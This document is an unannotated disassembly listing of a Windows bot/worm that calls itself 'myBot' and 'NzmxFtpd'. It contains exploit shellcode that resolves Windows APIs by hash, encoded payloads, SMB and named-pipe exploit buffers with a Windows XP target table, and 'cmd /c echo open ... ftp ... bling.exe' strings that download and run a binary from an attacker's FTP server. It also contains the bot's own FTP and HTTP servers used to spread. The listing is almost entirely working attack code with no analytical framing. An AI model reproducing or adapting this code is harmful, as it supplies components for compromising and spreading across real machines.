aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_4286E4 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_403EBA+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_428714 dd 0 ; DATA XREF: sub_403EBA+44�o
dd 800000D4h, 0
unk_428720 db 81h ; ; DATA XREF: sub_403F94+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
byte_42876C db 41h ; DATA XREF: sub_404032+107�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
; =============== S U B R O U T I N E =======================================
sub_4287B0 proc near ; DATA XREF: _0:0040430F�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_4288AC
push dword ptr [esi]
push 63D61209h
call sub_4288C2
mov [esi+8], eax
call sub_428875
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_4288C2
mov [esi+0Ch], eax
call sub_428827
push dword ptr [esi+4]
push 4C0297FAh
call sub_4288C2
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_4287B0 endp
; =============== S U B R O U T I N E =======================================
sub_428827 proc near ; CODE XREF: sub_4287B0+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_428850
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_428827 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428850 proc near ; CODE XREF: sub_428827+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_42885F: ; CODE XREF: sub_428850+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_42886C
inc ebx
jmp short loc_42885F
; ---------------------------------------------------------------------------
loc_42886C: ; CODE XREF: sub_428850+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_428850 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428875 proc near ; CODE XREF: sub_4287B0+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_42888D: ; CODE XREF: sub_428875+1E�j
cmp [ecx], ebx
jz short loc_428895
mov ecx, [ecx]
jmp short loc_42888D
; ---------------------------------------------------------------------------
loc_428895: ; CODE XREF: sub_428875+1A�j
mov edx, edi
loc_428897: ; CODE XREF: sub_428875+2A�j
cmp [edx+4], ebx
jz short loc_4288A1
mov edx, [edx+4]
jmp short loc_428897
; ---------------------------------------------------------------------------
loc_4288A1: ; CODE XREF: sub_428875+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_428875 endp
; =============== S U B R O U T I N E =======================================
sub_4288AC proc near ; CODE XREF: sub_4287B0+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_4288AC endp
; =============== S U B R O U T I N E =======================================
sub_4288C2 proc near ; CODE XREF: sub_4287B0+16�p
; sub_4287B0+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_4288D8: ; CODE XREF: sub_4288C2+33�j
jecxz short loc_428912
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_4288E5: ; CODE XREF: sub_4288C2+2D�j
lodsb
cmp al, ah
jz short loc_4288F1
ror edi, 0Dh
add edi, eax
jmp short loc_4288E5
; ---------------------------------------------------------------------------
loc_4288F1: ; CODE XREF: sub_4288C2+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_4288D8
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_428912: ; CODE XREF: sub_4288C2:loc_4288D8�j
; sub_4288C2:loc_428912�j
jmp short loc_428912
sub_4288C2 endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
sub_428918 proc near ; DATA XREF: _0:004042BF�o
arg_0 = dword ptr 4
add esp, 0FFFFF254h
cld
call sub_42896A
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
loc_428935: ; CODE XREF: sub_428918+38�j
jecxz short loc_428965
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor eax, eax
cdq
loc_428940: ; CODE XREF: sub_428918+32�j
lodsb
test al, al
jz short loc_42894C
ror edx, 0Dh
add edx, eax
jmp short loc_428940
; ---------------------------------------------------------------------------
loc_42894C: ; CODE XREF: sub_428918+2B�j
cmp edx, [esp+arg_0]
jnz short loc_428935
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov ebx, [ebx+ecx*4]
add ebx, ebp
loc_428965: ; CODE XREF: sub_428918:loc_428935�j
mov [esp+arg_0], ebx
retn
sub_428918 endp
; =============== S U B R O U T I N E =======================================
sub_42896A proc near ; CODE XREF: sub_428918+7�p
; FUNCTION CHUNK AT 004289A2 SIZE 00000007 BYTES
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_428983
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp loc_42898E
; ---------------------------------------------------------------------------
loc_428983: ; CODE XREF: sub_42896A+8�j
mov eax, [eax+34h]
add eax, 7Ch
mov ebp, [eax+3Ch]
loc_42898E: ; CODE XREF: sub_42896A+14�j
pop edi
xor esi, esi
pusha
push esi
jmp short loc_4289A2
sub_42896A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428995 proc near ; CODE XREF: sub_42896A:loc_4289A2�p
push 60E0CEEFh
push 0E8AFE98h
push edi
jmp edi
sub_428995 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42896A
loc_4289A2: ; CODE XREF: sub_42896A+29�j
call sub_428995
loc_4289A7: ; DATA XREF: sub_403A35+1B�o
; sub_40EE72+822�o
add [ebx], ah
; END OF FUNCTION CHUNK FOR sub_42896A
; ---------------------------------------------------------------------------
db 3 dup(0)
dword_4289AC dd 60h ; DATA XREF: sub_403A90+320�o
dword_4289B0 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_403A90+2F5�o
dword_4289BC dd 30h ; DATA XREF: sub_403A90+2CA�o
dword_4289C0 dd 0A1h ; DATA XREF: sub_403A90+29F�o
dword_4289C4 dd 3 ; DATA XREF: sub_403A90+246�o
aCccc db 'CCCC',0 ; DATA XREF: sub_403A90+153�o
align 10h
loc_4289D0: ; DATA XREF: sub_403A90+E8�o
jmp short near ptr dword_4289D8
; ---------------------------------------------------------------------------
align 8
dword_4289D8 dd 0 ; CODE XREF: _2:loc_4289D0�j
aCmdCEchoOpenSD db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: _0:004042E4�o
; sub_404E54+92�o ...
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
dword_428A50 dd 0E983C933h, 0D9EED9AFh, 5BF42474h ; DATA XREF: sub_40494F+2B0�o
; ---------------------------------------------------------------------------
loc_428A5C: ; CODE XREF: _2:00428A66�j
xor dword ptr [ebx+13h], 6AD31EBBh
sub ebx, 0FFFFFFFCh
loop loc_428A5C
inc edi
jz short loc_428AA3
and eax, 952CE753h
inc esp
jle short loc_428ACB
push es
lahf
cmp bl, [eax+2Fh]
xchg edx, [ebp+1FC36FAFh]
cmp al, 0E1h
; ---------------------------------------------------------------------------
dd 355806F4h, 89381F9Bh, 5E58578Bh, 5B3D1F30h, 0EE7F877Bh
dd 0ABD46A7Bh, 0A8D21371h, 3EE8EA50h
; ---------------------------------------------------------------------------
lahf
cmps byte ptr ss:[esi], byte ptr es:[edi]
loc_428AA3: ; CODE XREF: _2:00428A69�j
mov [eax], esi
inc ecx
imul dword ptr [ebx+50h]
js short near ptr loc_428B02+1
lock xchg ax, bp
; ---------------------------------------------------------------------------
dw 768Ch
dd 46D0F5BAh, 4EBF9730h, 5B107FA7h, 2A587A7Bh, 6693958Bh
dd 0C7CF6E30h
; ---------------------------------------------------------------------------
loc_428AC8: ; CODE XREF: _2:00428AF5�j
xor [esi-25h], bl
loc_428ACB: ; CODE XREF: _2:00428A71�j
xor al, 0D3h
nop
popf
db 64h
push edi
dec esi
sub al, 0BCh
mov al, ch
mov ch, 39h
fnsave byte ptr [esi-20h]
pop eax
shr dword ptr [ecx-60h], cl
pop eax
in al, 4Ah
sub al, 0BAh
loc_428AE4: ; CODE XREF: _2:00428B17�j
rcl ebp, cl
db 3Eh
xchg eax, esi
or byte ptr [esi+2Ch], 0BCh
in al, 97h
db 36h
or al, 3Ah
rep fld tbyte ptr [eax-12h]
jz short loc_428AC8
xchg eax, ebp
imul esi, [esi+0Ah], 63h
dec esi
mov bl, 84h
xchg eax, ebp
insd
dec ebp
loc_428B02: ; CODE XREF: _2:00428AA9�j
cmp byte ptr [ecx], 0E8h
dec ebp
nop
cmp eax, edi
dec ebp
sub al, 0BAh
fnsave byte ptr [esi-2Dh]
paddusw mm1, qword ptr [ebp+5Ah]
mov ebp, [esi]
jbe short loc_428B8E
jo short loc_428AE4
fld dword ptr [ebp+edx*4+3BC3746Dh]
out dx, al
loope near ptr loc_428B25+1
add bl, [edi]
loc_428B25: ; CODE XREF: _2:00428B21�j
mov bl, 0FDh
sub esp, 0FFFFFFE1h
add eax, 3E1EE39h
add bl, [esi+57h]
push ebp
and ebp, esp
loope near ptr loc_428B3A+2
cmp ch, bh
dec edx
loc_428B3A: ; CODE XREF: _2:00428B35�j
xchg dl, [ebp-72447295h]
retn 0AAD8h
; ---------------------------------------------------------------------------
db 3Dh
dd 9586C844h, 0EB9786Bh, 7B076DDh, 3AB9FB32h, 0E31F37E2h
dd 0E397745Ch, 99132F59h, 4791E011h, 0F9FF5C45h, 0C1EB6436h
dd 18BBB510h, 95C5AD45h, 0BC2C5ACEh, 3B8149E0h, 6BB94FEAh
dd 3B864FEAh, 0C7BBCE44h, 391D1B62h
db 44h, 0C8h
; ---------------------------------------------------------------------------
loc_428B8E: ; CODE XREF: _2:00428B15�j
mov ecx, 2C294495h
mov edx, 0E92F4930h
jg short loc_428C14
sub al, 0BCh
jmp near ptr 54448F82h
; ---------------------------------------------------------------------------
db 0D0h, 33h, 0Ah
dd 9505E1E8h, 6AD31E6Bh, 0
dword_428BB0 dd 0EFFFC481h, 44FFFFh, 428BFCh ; DATA XREF: sub_40494F+297�o
dword_428BBC dd 42Ah ; DATA XREF: sub_40494F+24A�r
dword_428BC0 dd 3E8h ; DATA XREF: sub_40494F+2BB�r
dword_428BC4 dd 258h ; DATA XREF: sub_40494F+28D�r
byte_428BC8 db 0 ; DATA XREF: sub_40494F+1F6�r
; sub_40494F+2C4�r
align 4
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dd 1
dword_428BE0 dd 20804h ; DATA XREF: sub_404853�r
; sub_40494F+2E2�o ...
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: _2:00428BCC�o
align 4
dd 646E6957h, 2073776Fh, 2C34544Eh, 30303220h, 53282030h
dd 532D3050h
; ---------------------------------------------------------------------------
loc_428C14: ; CODE XREF: _2:00428B98�j
push eax
xor al, 29h
loc_428C17: ; DATA XREF: sub_40494F+21E�o
add bl, ch
add al, [eax]
; ---------------------------------------------------------------------------
db 0
align 10h
dword_428C20 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40494F+14E�o
dword_428C34 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_40494F+F2�o
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_40494F+81�o
align 4
a_: ; DATA XREF: sub_40494F+10�o
; sub_406387+252�o
unicode 0, <.>,0
dword_428C60 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: _0:004050E2�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 2Dh dup(64646464h)
db 2 dup(64h)
word_429042 dw 6464h ; DATA XREF: _2:00428641�o
dd 11h dup(64646464h), 1016464h, 40h dup(65656565h), 66010165h
dd 40h dup(66666666h), 67670101h, 3Fh dup(67676767h), 1676767h
dd 68686801h, 3Fh dup(68686868h), 1016868h, 40h dup(69696969h)
dd 6A010169h, 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh)
dd 16B6B6Bh, 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh
dd 6D6D501Eh, 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h
dd 83877FD9h, 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h
dd 0C2F4FDECh, 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h
dd 86F4ED43h, 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h
dd 0AF5B8DF3h, 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h
dd 0EF4F5CBh, 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h
dd 0C7F474D4h, 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh
dd 0B50CAEA0h, 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h
dd 85773449h, 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh
dd 0D43C8A9Bh, 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh
dd 78281EB8h, 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh
dd 0EFAF269Dh, 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h
dd 0D0061FB1h, 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h
dd 0EB3F091h, 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h
dd 2C47A345h, 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h
dd 86158899h, 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h
dd 5780EE37h, 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h
dd 78A9269Bh, 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
loc_429E74: ; DATA XREF: _0:00405319�o
add al, 54h
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
loc_429E92: ; CODE XREF: _2:00429EE2�j
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
push esp
dec eax
inc ebx
fmul st(1), st
mov al, 42h
jmp short loc_429EE9
; ---------------------------------------------------------------------------
dec edx
inc ebx
push esp
dec eax
inc ebx
and [ecx], eax
jo short loc_429E92
inc edx
add [eax-52h], esi
inc edx
loc_429EE9: ; CODE XREF: _2:00429ED9�j
mov edi, esp
add edi, 2Ch
sub sp, 204h
xor ecx, ecx
mov dl, 35h
add cx, 138h
loc_429EFC: ; CODE XREF: _2:00429F03�j
mov bl, [edi]
xor bl, dl
mov [edi], bl
inc edi
loop loc_429EFC
ficom word ptr [esi]
dec edi
pop esp
aaa
xor [ecx+6Ch], bl
int 28h ; DOS 2+ internal - KEYBOARD BUSY LOOP
test eax, 79E4B9EBh
inc ebp
loope loc_429F4D
lds edx, [edx]
adc eax, 623D0515h
db 66h
pop es
push 6
pop es
assume es:_5
sbb esi, [ecx+79h]
jns short near ptr loc_429F59+3
fidiv word ptr [eax]
fxch4 st(4)
retf 0CACAh
; ---------------------------------------------------------------------------
db 68h
dd 5F1FD8B6h, 0BE516C05h, 3975BE34h, 982945BEh, 0B83D4DBEh
dd 2EBE096Ah, 6EBECE34h
; ---------------------------------------------------------------------------
dec ebp
loc_429F4D: ; CODE XREF: _2:00429F15�j
xor al, 0CEh
mov esi, 0CC34297Eh
mov esi, 0CF341166h
loc_429F59: ; CODE XREF: _2:00429F26�j
db 64h, 67h
mov si, 156Eh
xor al, 0CEh
add al, 0FCh
jz short near ptr loc_429F67+2
cmc
lodsb
loc_429F67: ; CODE XREF: _2:00429F63�j
mov esi, 0CB34BE01h
cdq
add al, 0F7h
in al, 0D7h
mov cl, 0F5h
inc eax
retn 833Ah
; ---------------------------------------------------------------------------
db 70h
dd 7071B830h, 250C5331h, 453D440h, 6B6D6F25h, 1E676563h
dd 3A74257Bh, 0BE7F3982h, 0CD34BD31h, 3078833Ah, 0EDB871BCh
dd 403078CBh, 3178CB8Bh, 78CB1441h, 2D68B817h, 0BCE5CA66h
dd 6D315FF2h, 0B53070BDh, 0B83F4270h, 5EB54168h, 4DDC2113h
dd 0BCCACACAh, 66EE04FBh, 63666666h, 0E5CA6373h, 536D60A2h
dd 255F05BCh, 60CA6260h, 62637BE1h, 66F960CAh, 60CA6260h
dd 70B8A2E5h, 60CA65BDh, 0CA6060D1h, 71B8DD60h, 66A13930h
dd 4D501B5Dh, 56695D50h, 4A15158h, 0F970B8E7h, 626262A1h
dd 0F3CB6666h, 0A167C734h, 654D70B8h, 65BD70B8h, 66663D84h
dd 0FBCB255Fh, 66666667h, 0D960CA60h, 60CACA5Fh, 0D5h
word_42A040 dw 7A69h ; DATA XREF: sub_405144+30�r
align 4
aEchoOpenSDOE_0 db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: sub_405144+97�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 10h
unk_42A0B0 db 2 ; DATA XREF: _0:00405367�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 25h, 73h, 2Eh
db 65h ; e
db 1Fh, 78h, 1Fh
db 70h ; p
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aAttemptingToRo db 'attempting to root %s',0
align 10h
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_4053D5+5D0�o
aQuit db 'QUIT',0 ; DATA XREF: sub_4053D5+5BC�o
; sub_40EE72+537�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_4053D5+5AF�o
align 4
unk_42A128 db 3 ; DATA XREF: sub_4053D5+564�o
db 33h, 6Eh, 2
db 7Ah ; z
db 1Fh, 6Dh, 1Fh
db 20h
db 28h, 66h, 74h
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 3, 34h
aSPortDNowExecu db '»» %s, port:%d now executing %s on remote ABOSAL7.',0
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_4053D5+545�o
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_4053D5+519�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_4053D5+501�o
align 10h
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_4053D5+4EC�o
align 10h
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_4053D5+4DB�o
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_4053D5+4A8�o
align 4
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_4053D5+464�o
db ']',0
aPort db 'PORT',0 ; DATA XREF: sub_4053D5+42B�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_4053D5+3FD�o
align 4
aList db 'LIST',0 ; DATA XREF: sub_4053D5+3EA�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_4053D5+3AF�o
align 10h
aPasv db 'PASV',0 ; DATA XREF: sub_4053D5+39C�o
align 4
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_4053D5+38C�o
aI: ; DATA XREF: sub_4053D5+378�o
unicode 0, <I>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_4053D5+351�o
aA: ; DATA XREF: sub_4053D5+33D�o
unicode 0, <A>,0
aType db 'TYPE',0 ; DATA XREF: sub_4053D5+326�o
; sub_4053D5+361�o
align 10h
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_4053D5+316�o
align 10h
off_42A2D0 dd offset dword_445750 ; DATA XREF: sub_4053D5+302�o
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_4053D5+2F2�o
align 4
aRest db 'REST',0 ; DATA XREF: sub_4053D5+2DE�o
align 10h
a215Nzmxftpd db '215 NzmxFtpd',0Ah,0 ; DATA XREF: sub_4053D5+2CE�o
align 10h
aSyst db 'SYST',0 ; DATA XREF: sub_4053D5+2BA�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_4053D5+2AA�o
align 10h
aPass db 'PASS',0 ; DATA XREF: sub_4053D5+296�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_4053D5+286�o
align 10h
aUser_0 db 'USER',0 ; DATA XREF: sub_4053D5+271�o
align 4
aSS db '%s %s',0 ; DATA XREF: sub_4053D5+260�o
align 10h
a220Nzmxftpd0wn db '220 NzmxFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_4053D5+1D8�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_405A58+24�o
; sub_406C19+12E�o ...
align 4
unk_42A36C db 2 ; DATA XREF: sub_405AF2+3F8�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aErrorServerFai db 'Error: server failed, returned: <%d>.',0
align 10h
asc_42A3B0 db 0Dh,0Ah,0 ; DATA XREF: sub_405AF2+2CF�o
align 4
asc_42A3B4: ; DATA XREF: sub_405AF2+293�o
; sub_40EE72+A8�o ...
unicode 0, < >,0
aGet db 'GET ',0 ; DATA XREF: sub_405AF2+269�o
align 10h
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405F4D+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_405F4D+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_405F4D+98�o
; sub_40B8D8+1AE�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_405F4D+84�o
align 4
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_405F4D:loc_405FB3�o
align 4
aTextHtml db 'text/html',0 ; DATA XREF: sub_405F4D+5F�o
align 4
unk_42A5D4 db 2 ; DATA XREF: sub_4060D0+296�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
